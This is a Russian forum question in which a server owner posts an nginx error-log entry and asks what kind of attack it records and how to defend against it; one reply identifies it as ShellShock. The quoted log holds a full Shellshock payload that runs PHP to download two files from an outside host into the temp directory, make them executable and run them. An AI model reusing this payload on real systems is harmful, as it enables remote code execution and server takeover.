@Aptop

Как уберечься от атак такого рода?

Открыл error.log nginx увидел такое:
2015/04/22 08:10:04 [error] 29614#0: *74351 FastCGI sent in stderr: "Primary script unknown" while reading response header from upstream, client: 82.113.183.202, server: foo.net, request: "GET /cgi-bin/tree.php HTTP/1.0", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", referrer: "() { :;} ;echo;/usr/local/bin/php -r '$a = "r0r.me/r/r0r01";''$b = "r0r.me/r/r0r02";''$c = sys_get_temp_dir();''$d = "r0r01";''$e = "r0r02";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''if ($i($c . "/$d"))''{''exit(1);''}else{''echo($c);''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'"
Был найден файл в папке /tmp. С контентом в base64.
Как называется такой вид атаки и как от нее защищаться?
  • Вопрос задан
  • 247 просмотров
Пригласить эксперта
Ответы на вопрос 1
@vilgeforce
Раздолбай и программист
ShellShock это, я думаю.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы